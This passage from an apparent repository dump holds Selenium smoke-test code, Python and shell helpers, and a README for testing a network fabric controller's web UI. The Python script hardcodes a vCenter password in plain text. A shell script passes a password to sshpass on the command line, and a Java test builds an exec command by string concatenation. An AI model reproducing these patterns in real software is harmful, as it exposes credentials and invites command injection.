extends PageInfra {\n\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.ia-dashboard-menu\")\n\tWebElement dashboardIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.ia-config-menu\")\n\tWebElement configIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.ia-tag-menu\")\n\tWebElement tagIcon;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-sm.btn-primary\")\n\tWebElement addButton;\n\t\n\t@FindBy(how= How.CSS, using = \"a#taggingOptions.btn.btn-default.dropdown-toggle\")\n\tWebElement tagOptions;\n\t\n\t@FindBy(how = How.NAME, using = \"username\")\n\tWebElement userName;\n\t\n\t@FindBy(how = How.NAME, using = \"password\")\n\tWebElement password;\n\n\t@FindBy(how = How.NAME, using = \"ok\")\n\tWebElement okButton;\n\n\t@FindBy(how = How.CSS, using = \"div.metric-value.ng-binding\")\n\tWebElement countIcons;\n\t\n\t@FindBy(how = How.CSS, using = \"input[type = 'text']\")\n\tWebElement searchBox;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-primary\")\n\tWebElement confirmOkButton;\n\t\n\t\n\t@FindBy(how= How.CSS, using = \"span.switch\")\n\tWebElement spanSwitch;\n\t\n\t/* Field names used for webdriver findElement*/\n\tString iframeTag = \"iframe\";\n\tString switchListName = \"ul.dropdown-menu li\";\n\tString insightCountWidget = \"div.metric-value.ng-binding\";\n\tString inputTagName = \"input\";\n\tString srchString = \"a[title=\";\t\n\tString uploadTagStr = \"Upload Tags\";\n\tString clearTagStr = \"Clear Tags\";\n\tString fileUpload = \"div.holder\"; \n\tString countIconsId = \"div.metric-value.ng-binding\";\n\t\n\t\n\tpublic VCFIaIndexPage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\t\n\tpublic void applySearchFilter(String searchString) {\n\t\twaitForElementVisibility(searchBox,100);\n\t\tsetValue(searchBox,searchString);\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean existsOn = false;\n\t\texistsOn = (driver.findElements(By.cssSelector(srchString+\"'\"+searchString+\"'\")).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(existsOn) {\n\t\t\tdriver.findElement(By.cssSelector(srchString+\"'\"+searchString+\"'\")).click();\n\t\t}\n\t}\n\t\n\tpublic List<WebElement> getInsightCount() {\n\t\tList<WebElement> rows = new 
ArrayList();\n\t\tdashboardIcon.click();\n\t\twaitForElementVisibility(driver.findElement(By.tagName(iframeTag)),1000);\n\t\tdriver.switchTo().frame(driver.findElement(By.tagName(iframeTag)));\t\n\t\t//retryingFindClick(By.cssSelector(countIconsId));\n\t\twaitForElementVisibility(countIcons,120);\n\t\trows = driver.findElements(By.cssSelector(insightCountWidget));\n\t\treturn rows;\n\t}\n\t\n\tpublic int getConnectionCount() {\n\t\tint connCount = 0;\n\t\tList <WebElement> rows = getInsightCount();\n\t\t\tif(!rows.isEmpty()) {\n\t\t\t\tString connOutput = rows.get(0).getText();\n\t\t\t\tif(StringUtils.contains(connOutput, ',')) {\n\t\t\t\t\tconnOutput = StringUtils.remove(connOutput, ',');\n\t\t\t\t}\n\t\t\t\tif(connOutput.equals(\"\")) {\n\t\t\t\t\tconnCount = 0;\n\t\t\t\t} else {\n\t\t\t\t\tconnCount = Integer.parseInt(connOutput);\n\t\t\t\t}\n\t\t\t}\n\t\t\tdriver.switchTo().defaultContent();\n\t\treturn connCount;\n\t}\n\t\n\tpublic int getAppCount() {\n\t\tint connCount = 0;\n\t\tList <WebElement> rows = getInsightCount();\n\t\t\tif(!rows.isEmpty()) {\n\t\t\t\tString connOutput = rows.get(1).getText();\t\n\t\t\t\tif(StringUtils.contains(connOutput, ',')) {\n\t\t\t\t\tconnOutput = StringUtils.remove(connOutput, ',');\n\t\t\t\t} \n\t\t\t\tif(connOutput.equals(\"\")) {\n\t\t\t\t\tconnCount = 0;\n\t\t\t\t} else {\n\t\t\t\t\tconnCount = Integer.parseInt(connOutput);\n\t\t\t\t}\n\t\t\t}\n\t\t\tdriver.switchTo().defaultContent();\t\n\t\treturn connCount;\n\t}\n\t\n\t\n\tpublic void gotoIADashboard() {\n\t\tdashboardIcon.click();\n\t\twaitForElementVisibility(driver.findElement(By.tagName(iframeTag)),1000);\n\t}\n\t\t\n\tpublic static void setClipboardData(String string) {\n\t\t//StringSelection is a class that can be used for copy and paste operations.\n\t\tStringSelection stringSelection = new StringSelection(string);\n\t\tToolkit.getDefaultToolkit().getSystemClipboard().setContents(stringSelection, null);\n\t}\n\t\n\tpublic void uploadTag(String fileLocation) throws Exception{\n\t\ttagIcon.click();\n\t\twaitForElementVisibility(tagOptions,100);\n\t\ttagOptions.click();\n\t\tWebElement uploadTags = findAnchorTags(uploadTagStr);\n\t\tuploadTags.click();\n\t\twaitForElementVisibility(driver.findElement(By.cssSelector(fileUpload)),100);\n\t\tWebElement element = driver.findElement(By.cssSelector(fileUpload));\n\t\telement.click(); //Click on fileUpload\n\t\tsetClipboardData(fileLocation);\n\t\t Robot robot = new Robot();\n\t\t robot.keyPress(KeyEvent.VK_CONTROL);\n robot.keyPress(KeyEvent.VK_V);\n robot.keyRelease(KeyEvent.VK_V);\n robot.keyRelease(KeyEvent.VK_CONTROL);\n robot.keyPress(KeyEvent.VK_ENTER);\n robot.keyRelease(KeyEvent.VK_ENTER);\n \n WebDriverWait myWaitVar = new WebDriverWait(driver,1000);\n\t\t myWaitVar.until(ExpectedConditions.elementToBeClickable(okButton));\n\t\t waitForElementVisibility(okButton,100);\n\t\t// To click on the submit button (Not the browse button)\n\t\t okButton.click();\n\t\t//String checkText = driver.findElement(By.id(\"message\")).getText();\n\t\t//Assert.assertEquals(\"File uploaded successfully\", checkText);\t\n\t}\n\t\n\t\n\tpublic WebElement findAnchorTags(String anchorText) {\n\t\tList <WebElement> anchorTags = driver.findElements(By.cssSelector(\"a\"));\n\t\tWebElement returnRow = null;\n\t\tfor (WebElement row:anchorTags) {\n\t\t\tif(row.getText().equalsIgnoreCase(anchorText)) {\n\t\t\t\treturnRow = row;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\treturn returnRow;\n\t}\n\t\n}\n"
},
{
"alpha_fraction": 0.7420316934585571,
"alphanum_fraction": 0.7448275685310364,
"avg_line_length": 35.74657440185547,
"blob_id": "bc403f089cbd3293d0f17887ba25c6c03b90f7e1",
"content_id": "f03e92e08aeae987381182706eda4db5f8093abd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5365,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 146,
"path": "/src/test/java/com/pluribus/vcf/test/IATest.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.test;\nimport com.pluribus.vcf.helper.TestSetup;\nimport com.jcabi.ssh.Shell;\nimport com.pluribus.vcf.helper.IperfSetup;\nimport com.pluribus.vcf.helper.SwitchMethods;\nimport com.pluribus.vcf.helper.PageInfra;\nimport com.pluribus.vcf.pagefactory.VCFLoginPage;\nimport com.pluribus.vcf.pagefactory.VCFHomePage;\nimport com.pluribus.vcf.pagefactory.VCFIaIndexPage;\nimport org.testng.annotations.BeforeClass;\nimport org.testng.annotations.BeforeTest;\nimport org.testng.annotations.Optional;\nimport org.testng.annotations.Test;\nimport org.testng.annotations.Parameters;\nimport java.io.BufferedReader;\nimport java.io.BufferedWriter;\nimport java.io.FileNotFoundException;\nimport java.io.FileOutputStream;\nimport java.io.FileReader;\nimport java.io.FileWriter;\nimport java.io.InputStreamReader;\nimport java.io.OutputStreamWriter;\nimport java.io.Writer;\n\npublic class IATest extends TestSetup {\n\tprivate VCFHomePage home1;\n\tprivate VCFIaIndexPage iaIndex;\n\tprivate VCFLoginPage login;\n\tprivate IperfSetup perf;\n\tprivate SwitchMethods cli;\n\tprivate String user = \"network-admin\";\n\tprivate String passwd = \"test123\";\n\t\n\t@Parameters({\"clientIp\",\"serverIp\",\"mgmtIp\"})\n\t@BeforeClass(alwaysRun = true)\n\tpublic void init(String clientIp, String serverIp, String mgmtIp) {\n\t\tcli = new SwitchMethods(mgmtIp);\n\t\t//cli.restartTomcat();//Workaround for bug 15007\n\t\tlogin = new VCFLoginPage(getDriver());\n\t\thome1 = new VCFHomePage(getDriver());\n\t\tiaIndex = new VCFIaIndexPage(getDriver());\n\t\tperf = new IperfSetup(clientIp,serverIp);\n\t}\n\t\n\t@Parameters({\"password\"}) \n\t@Test(alwaysRun = true)\n\tpublic void logintoIA(@Optional(\"test123\") String password) {\n\t\tlogin.login(\"admin\", password);\n\t\thome1.gotoIA();\n\t}\n\t\n\t@Parameters({\"vcfIp\",\"switchName\",\"trafficDestIp\",\"trafficSrcIp\",\"trafficNumSessions\",\"trafficInterval\"}) \n\t@Test(groups={\"smoke\",\"regression\"},dependsOnMethods={\"logintoIA\"},description=\"Send traffic and verify stats\")\n\tpublic void simpleTrafficTest(String vcfIp, String switchName, String trafficDestIp, String trafficSrcIp, int trafficNumSessions, int trafficInterval) throws Exception{\n\t\t// Clearing switch before test\n\t\tcli.clearSessions();\n\t\t\n\t\t// Iperf setup \n\t\tperf.startServer();\n\t\tperf.sendTraffic(trafficNumSessions, trafficInterval, trafficDestIp);\n\t\t\n\t\t//Verify on switch first\n\t\tint connCount = cli.getConnectionCount(trafficDestIp);\n\t\tif(connCount == trafficNumSessions) {\n\t\t\tprintLogs(\"info\",\"simpleTrafficTest\",\"Connection count test passed on switch\"+switchName);\n\t\t} else {\n\t\t\tprintLogs(\"error\",\"simpleTrafficTest\",\"Connection count test failed on switch\"+switchName);\n\t\t}\n\t\t\n\t\t//Verify on elastic search CLI \t\n\t\tProcess p = Runtime.getRuntime().exec(\"src/test/resources/es_script.expect \"+vcfIp);\n\t\tp.waitFor();\n\t\tStringBuffer output = new StringBuffer();\n\t\tBufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream())); \n\t\tString line = \"\"; \n\t\twhile ((line = reader.readLine())!= null) { \n\t\t\toutput.append(line + \"\\n\"); \n\t\t\t} \n\t\tprintLogs(\"info\",\"elasticSearchVerification\",output.toString());\n\t\n\t\tboolean status = false;\n\t\tiaIndex.gotoIADashboard();\n\t\t// Verify on VCFC \n\t\tstatus = verifyVCFCount(trafficNumSessions);\n\t\tif(status == true) {\n\t\t\tprintLogs(\"info\",\"simpleTrafficTest\",\"VCFC count verification passed\");\n\t\t} else 
{\n\t\t\tprintLogs(\"error\",\"simpleTrafficTest\",\"VCFC count verification failed\");\t\t\t\n\t\t}\n\t\t\n\t\t//Apply search filter for srcIp\n\t\tiaIndex.applySearchFilter(\"dstIp: \"+trafficDestIp);\n\t\tstatus = verifyVCFCount(trafficNumSessions);\n\t\tif(status == true) {\n\t\t\tprintLogs(\"info\",\"simpleTrafficTest\",\"VCFC count verification after applying dstIp filter passed\");\n\t\t} else {\n\t\t\tprintLogs(\"error\",\"simpleTrafficTest\",\"VCFC count verification after applying dstIP filter failed\");\t\t\t\n\t\t}\n\t\t\n\t\t//Apply search filter for srcIp\n\t\tiaIndex.applySearchFilter(\"srcIp: \"+trafficSrcIp);\n\t\tstatus = verifyVCFCount(trafficNumSessions);\n\t\tif(status == true) {\n\t\t\tprintLogs(\"info\",\"simpleTrafficTest\",\"VCFC count verification after applying srcIp filter passed\");\n\t\t} else {\n\t\t\tprintLogs(\"error\",\"simpleTrafficTest\",\"VCFC count verification after applying srcIP filter failed\");\t\t\t\n\t\t}\n\t\tif(status == false) {\n\t\t\tthrow new Exception(\" Simple traffic test failed\");\n\t\t}\n\t}\n\t\n\t/*\n\t@Test(groups={\"smoke\",\"regression\"},dependsOnMethods={\"addCollectorTest\"},description=\"Tagging test\")\n\tpublic void tagTest() throws Exception{\n\t\tString fileLoc = \"C:\\\\Desktop\\\\srcIp.csv\";\n\t\twriteToFile(fileLoc,\"item_srcip,item_dstip,Owner,Device,Group,Function,Name,Security_List\\n4.4.4.129,,,,,,,\");\n\t\tiaIndex.uploadTag(fileLoc);\n\t}\n\t\n\t@Test(groups={\"smoke\",\"regression\"},dependsOnMethods={\"tagTest\"},description=\"Logout of VCFC\")\n\tpublic void logout() {\n\t\tlogin.logout();\n\t}\n\t*/\n\tpublic boolean verifyVCFCount(int trafficNumSessions) {\n\t\tboolean status = true;\n\t\tint vcfcConnCount = iaIndex.getConnectionCount();\n\t\tcom.jcabi.log.Logger.info(\"verifyVCFCCount\",\"vcfcConnCount:\"+vcfcConnCount);\n\t\tint vcfcAppCount = iaIndex.getAppCount();\n\t\tprintLogs(\"info\",\"verifyVCFCCount\",\"vcfcAppCount:\"+vcfcAppCount);\n\n\t\tif (vcfcConnCount != trafficNumSessions) {\n\t\t\tprintLogs(\"error\",\"verifyVCFCCount\",\"vcfcConnCount:\"+vcfcConnCount+\"expected:\"+trafficNumSessions);\n\t\t\tstatus = false;\n\t\t} \n\t\tif (vcfcAppCount != 1) {\n\t\t\tprintLogs(\"error\",\"verifyVCFCCount\",\"vcfcAppCount:\"+vcfcAppCount);\n\t\t\tstatus = false;\n\t\t}\n\t\t\n\t\treturn status;\n\t}\n\t\n\t\n}\n"
},
{
"alpha_fraction": 0.6702820062637329,
"alphanum_fraction": 0.7093275785446167,
"avg_line_length": 24.61111068725586,
"blob_id": "228af1cc5922fdc627d3c6628cee1e5275108c73",
"content_id": "3e616cf6a47e86b6d38a327bd16b95fa7ee832b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 461,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 18,
"path": "/findIP.py",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "import sys,ssl\nfrom pprint import pprint\nfrom pysphere import VIServer\n\nserver = VIServer()\nVCENTER_IP=\"10.9.34.204\"\nVCENTER_USER=\"[email protected]\"\nVCENTER_PASS=\"MyTest-456\"\n\n#ova_name=\"VCFC-2.2.0-jenkins-3108\"\nova_name=sys.argv[1]\n\nserver.connect(VCENTER_IP,VCENTER_USER,VCENTER_PASS)\n\nvm = server.get_vm_by_name(ova_name)\nnet_info = vm.get_property('net',False)\nvcfc_ip=[ x['ip_addresses'][0] for x in net_info if x['network'] == 'VM Network' ][0]\nprint vcfc_ip\n"
},
{
"alpha_fraction": 0.7046263217926025,
"alphanum_fraction": 0.7233096361160278,
"avg_line_length": 43.959999084472656,
"blob_id": "8a7a0381b1cae3f595ac0a26c5109229f1ab9693",
"content_id": "d6d9d70f873278d4ef9bf581e2a95d0ff538652a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1124,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 25,
"path": "/README.md",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "VCFC testsuite\n\nMandatory parameters \n - in testng.xml file\n <parameter name=\"switchName\" value=\"leo-vcf-3\"></parameter>\n <parameter name=\"mgmtIp\" value=\"10.9.21.50\"></parameter>\n <parameter name=\"dataNodeHost\" value=\"10.9.8.85\"></parameter>\n - through command line\n vcfIp: This is the IP of the VCF instance\n browser: Browser to run test on\n\nOptional attributes:\n\t1. This is required if a different password (not the default is desired for test purposes) for your VCF instance\n\t<parameter name = \"password\" value=\"value_to_be_set_for_vcfc_instance\"></parameter>\n\t2. To use your browserstack credentials:\n <parameter name= \"bsUserId\" value=\"BS_uid\"></parameter>\n <parameter name= \"bsKey\", value=\"BS_Key\"></parameter>\n\t3. If this value is set to 0 (default is 1), then the VCFC session will not be cleaned up and test will start in the existing system\n <parameter name= \"cleanBeforeTest\", value=0/1></parameter>\n\nHow to invoke:\nRun shell script in directory (OR)\nmvn -Dvcfp=IP_addr -Dbrowser=Chrome/Firefox/IE -Dgroups=Smoke clean install\n# VCFC-smoketest-master\n# VCFC-smoketest-master\n"
},
{
"alpha_fraction": 0.6143791079521179,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 24.5,
"blob_id": "a3a7cfb6fcbc2d93e50236c4e4f56de644ef792f",
"content_id": "81f760c0bbb927e4d1ec5d2a2ee3c477108118c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 6,
"path": "/src/test/resources/start_server.sh",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nHOST=$1\nUSERNAME=$2\nPASSWORD=$3\n\n/usr/local/bin/sshpass -p ${PASSWORD} ssh ${USERNAME}@${HOST} \"nohup /usr/bin/iperf -s -D > /dev/null 2>&1\"\n"
},
{
"alpha_fraction": 0.6016949415206909,
"alphanum_fraction": 0.6069100499153137,
"avg_line_length": 30.094594955444336,
"blob_id": "3a12ad8e7b80529004b39d0081c2920ab34ffac0",
"content_id": "5978761dd496c7674ddf2ce30fbb449ff5017526",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4602,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 148,
"path": "/src/test/java/com/pluribus/vcf/helper/PageInfra.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.helper;\n\nimport java.util.ResourceBundle;\nimport java.util.concurrent.TimeUnit;\nimport java.util.List;\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.Keys;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.interactions.Actions;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedCondition;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.Select;\nimport org.openqa.selenium.support.ui.WebDriverWait;\n\npublic class PageInfra {\n protected WebDriver driver;\n protected ResourceBundle rb;\n protected Select select;\n\n\n public PageInfra(WebDriver driver) {\n PageFactory.initElements(driver, this);\n this.driver = driver;\n }\n\n public void setValue(WebElement field, String strUserName) {\n field.clear();\n field.sendKeys(strUserName);\n }\n\n public void setValue(WebElement field, String value, Keys key) {\n field.clear();\n field.sendKeys(value, key);\n } \n \n public void selectElement(WebElement field, String value) {\n \tSelect mySelect= new Select(field);\n \tList<WebElement> options = mySelect.getOptions();\n \tfor (WebElement option : options) {\n \t if (option.getText().equalsIgnoreCase(value)) {\n \t option.click();\n \t }\n \t}\n }\n public void moveToElements(WebElement field,WebElement field2) {\n Actions builder = new Actions(driver);\n waitForElementVisibility(field, 50);\n builder.moveToElement(field).moveToElement(field2).build().perform();\n }\n \n public void clickOnElements(WebElement field,WebElement field2) {\n Actions builder = new Actions(driver);\n waitForElementVisibility(field, 50);\n builder.moveToElement(field).click(field2).build().perform();\n }\n \n public void waitForElementPresent(By locator) {\n WebElement el\n = (new WebDriverWait(driver, 10))\n .until(ExpectedConditions.presenceOfElementLocated(locator));\n }\n\n public Boolean waitForElementStaleUp(WebElement el, int time) {\n return (new WebDriverWait(driver, time)).until(ExpectedConditions.stalenessOf(el));\n }\n\n public WebElement waitForElementVisibility(WebElement el, int time) {\n return (new WebDriverWait(driver, time))\n .until(ExpectedConditions.visibilityOf(el));\n }\n\n public WebElement waitForElementVisibility(WebElement el) {\n return (new WebDriverWait(driver, 15))\n .until(ExpectedConditions.visibilityOf(el));\n }\n\n public WebElement waitForElementToClick(final By locator,int waitTime) {\n return (new WebDriverWait(driver, waitTime))\n .until(ExpectedConditions.elementToBeClickable(locator));\n }\n \n public boolean retryingFindClick(By by) {\n \t boolean result = false;\n int attempts = 0;\n while(attempts < 10) {\n try {\n \t boolean exists = (driver.findElements(by)).size() != 0;\n \t if(exists) {\n \t\t result = true;\n \t\t break;\n \t } else {\n \t\t //WebDriver wait = new WebDriverWait(driver,30);\n \t }\n } catch(Exception e) {\n }\n attempts++;\n }\n return result;\n }\n \n public boolean retryingFindClick (WebElement el) {\n \tboolean result = false;\n \tint attempts = 0;\n while(attempts < 10) {\n \ttry {\n \t\tel.click();\n \t\tresult = true;\n \t\tbreak;\n \t} catch (Exception e) {\n \t}\n \tattempts++;\n }\n return result;\n }\n \n public boolean retryingFindClick(WebElement el, By by) {\n boolean result = false;\n int attempts = 0;\n while(attempts < 10) {\n try {\n \t\tel.findElement(by).click();\n result = true;\n break;\n } catch(Exception e) {\n }\n attempts++;\n }\n 
return result;\n }\n \n public ExpectedCondition<WebElement> visibilityOfElementLocated(final By locator) {\n return new ExpectedCondition<WebElement>() {\n public WebElement apply(WebDriver driver) {\n WebElement toReturn = driver.findElement(locator);\n if (toReturn.isDisplayed()) {\n return toReturn;\n }\n return null;\n }\n };\n }\n\n public ResourceBundle getBundle() {\n return rb;\n }\n}\n"
},
{
"alpha_fraction": 0.692819356918335,
"alphanum_fraction": 0.7061231732368469,
"avg_line_length": 31.214284896850586,
"blob_id": "2f970f818d768c4668da9967a12b73dc5218acd5",
"content_id": "fb6abb81bc331ab82b3cc3d498a4ed891e4c52a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 17589,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 546,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/VcfSettingsPage.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\nimport com.pluribus.vcf.helper.PageInfra;\nimport java.net.MalformedURLException;\nimport java.net.URL;\nimport java.util.ArrayList;\nimport java.util.List;\nimport java.util.concurrent.TimeUnit;\n\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.interactions.Actions;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\n\npublic class VcfSettingsPage extends PageInfra{\n\t/* Settings toolbar */\t\n\t@FindBy(how = How.XPATH, using = \".//a[contains(@href,'/vcf-center/license')]\")\n\tWebElement licenseTab;\n\n\t@FindBy(how = How.XPATH, using = \".//a[contains(@href,'/vcf-center/datanode')]\")\n\tWebElement dataNodeTab;\n\n\t@FindBy(how = How.XPATH, using = \".//a[contains(@href,'/vcf-center/collector')]\")\n\tWebElement collectorMgmtTab;\n\n\t@FindBy(how = How.CSS, using = \"span.fa-stack-1x.pnc-text\")\n\tWebElement pncCloudbutton;\n\t\n\t@FindBy(how = How.ID, using = \"username\")\n\tWebElement username;\n\t\n\t@FindBy(how = How.NAME, using = \"name\")\n\tWebElement name;\n\t\n\t@FindBy(how = How.ID, using = \"password\")\n\tWebElement password;\n\t\n\t@FindBy(how = How.NAME, using = \"ok\")\n\tWebElement okButton;\n\t\n\t@FindBy(how = How.NAME, using = \"cancel\")\n\tWebElement cancelButton;\n\t\n\t@FindBy(how = How.CSS, using = \"button.btn.btn-sm.btn-primary\")\n\tWebElement addButton;\n\t\n\t@FindBy(how = How.ID, using = \"name\")\n\tWebElement nodeName;\n\t\n\t@FindBy(how = How.ID, using = \"host\")\n\tWebElement nodeHost;\n\t\n\t@FindBy(how = How.NAME, using = \"sudo\")\n\tWebElement sudo;\n\t\n\t@FindBy(how = How.ID, using = \"heapsize\")\n\tWebElement heapsize;\n\t\n\t@FindBy(how = How.ID, using = \"mgmt-ip\")\n\tWebElement mgmtIp;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.config-menu\")\n\tWebElement switchMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.health-menu\")\n\tWebElement healthMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.server-menu\")\n\tWebElement serverMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.apps-menu\")\n\tWebElement appsMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.certs-menu\")\n\tWebElement certsMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.admin-menu\")\n\tWebElement adminMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.fa.fa-cogs\")\n\tWebElement vcfSettingsIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.fa.fa-home\")\n\tWebElement vcfHomeIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.fa.fa-sign-out\")\n\tWebElement vcfLogout;\n\t\t\n\t@FindBy(how = How.CSS, using = \"button.btn.btn-primary.btn-xs\")\n\tWebElement AddAuthServer;\n\t\n\t@FindBy(how = How.CSS, using = \"button.btn.btn-default.btn-sm\")\n\tWebElement dropDown;\n\t\n\t@FindBy(how = How.NAME, using = \"baseDn\")\n\tWebElement baseDn;\n\t\n\t@FindBy(how = How.ID, using = \"ldapManagerDn\")\n\tWebElement ldapManagerDn;\n\t\n\t@FindBy(how = How.NAME, using = \"ldapManagerPass\")\n\tWebElement ldapManagerPass;\n\t\n\t@FindBy(how = How.NAME, using = \"ldapUserDnPatterns\")\n\tWebElement ldapUserDnPatterns;\n\t\n\t@FindBy(how = How.NAME, using = \"ldapUserSearchFilter\")\n\tWebElement 
ldapUserSearchFilter;\n\t\n\t@FindBy(how = How.CSS, using = \"div.td\")\n\tWebElement switchList;\n\t\n\t@FindBy(how = How.CSS, using = \"div.stats.ng-scope\")\n\tWebElement switchStats;\n\t\n\t@FindBy(how = How.CSS, using = \"div [ui-view]\")\n\tWebElement healthDetail;\n\t\n\t@FindBy(how = How.CSS, using = \"div#tr_cert_0\")\n\tWebElement certsDetail;\n\t\n\t@FindBy(how = How.CSS, using = \"div#tr_apps_0\")\n\tWebElement appsDetail;\n\t\n\t@FindBy(how = How.CSS, using = \"button.btn.btn-primary.btn-xs\")\n\tWebElement addAdmin;\n\t\n\t@FindBy(how = How.CSS, using = \"ng-transclude\")\n\tWebElement listLicense;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-default.btn-sm\")\n\tWebElement switchDropDown;\n\t\n\t@FindBy(how= How.CSS, using = \"div.panel-heading.mirror-head\")\n\tWebElement collectorList;\n\t\n\t@FindBy(how= How.CSS, using = \"span.switch\")\n\tWebElement spanSwitch;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-primary\")\n\tWebElement confirmOkButton;\n\t\n\t@FindBy(how= How.CSS, using = \"table-pane\")\n\tWebElement defaultCollectorList;\n\t\n\t/*Widget names for findElement(s) calls */\n\tString authSeedIcon = \"span.icon-img-link.fa.fa-pencil\";\n\tString seedList = \"div[name=form]\";\n\tString licenseList = \"ng-transclude\";\n\tString licenseName = \"ng-transclude div.panel.panel-default\";\n\tString deleteIcon = \"span.icon-img-link.fa fa-trash-o.ng-scope\";\n\tString msgPopup = \"button.close\";\n\tString addButtonCss = \"button.btn.btn-sm.btn-primary\";\n\tString switchListId = \"div.td\";\n\tString instLicKey = \"button.btn-sm.btn-primary\";\n\tString keyTextBox = \"key\";\n\tString collectorListId = \"div.panel-heading.mirror-head\";\n\tString collectorAddButtons = \"button.btn.btn-sm.btn-primary\";\n\tString toggleSwitch = \"span.switch\";\n\tString switchOnState = \"span.toggle-bg.on\";\n\tString switchOffState = \"span.toggle-bg.off\";\n\tString editIcon = \"span.icon-img-link.fa.fa-pencil\";\n\tString collButtonString = \"Add Netvisor Collector\";\n\tString switchListName = \"ul.dropdown-menu li\";\n\tString licenseActivateButton = \"button.btn.btn-xs.btn-primary\";\n\tString seedSwitchAddMsgBox = \"div.modal-dialog\";\n\t\n\tpublic VcfSettingsPage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\t\n\tpublic void vcfSettingsPage() {\n\t\tvcfSettingsIcon.click();\n\t}\n\n\tpublic void addSeedSwitch(String name , String usrname, String mgmtip, String pwd) throws Exception{\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(addButton,1000);\n\t\twaitForElementToClick(By.cssSelector(addButtonCss),100);\n\t\tActions actions = new Actions(driver);\n \tactions.moveToElement(addButton).perform();\n\t\tretryingFindClick(addButton);\n\t\twaitForElementVisibility(driver.findElement(By.cssSelector(seedSwitchAddMsgBox)),100);\n\t\tsetValue(mgmtIp,mgmtip);\n\t\tThread.sleep(2000);\n\t\tsetValue(username,usrname);\n\t\tThread.sleep(2000);\n\t\tsetValue(password,pwd);\n\t\tThread.sleep(2000);\n\t\twaitForElementVisibility(okButton,100);\n\t\tretryingFindClick(okButton);\n\t\tThread.sleep(5000);\n\t\twaitForElementVisibility(switchList,1000);\n\t}\n\n\tpublic List getSwitchList() {\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(switchListName));\n\t\treturn rows;\n\t}\n\n\tpublic boolean isCollectorConfigured(String collName) {\n\t\tboolean isColl = false;\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean exists = 
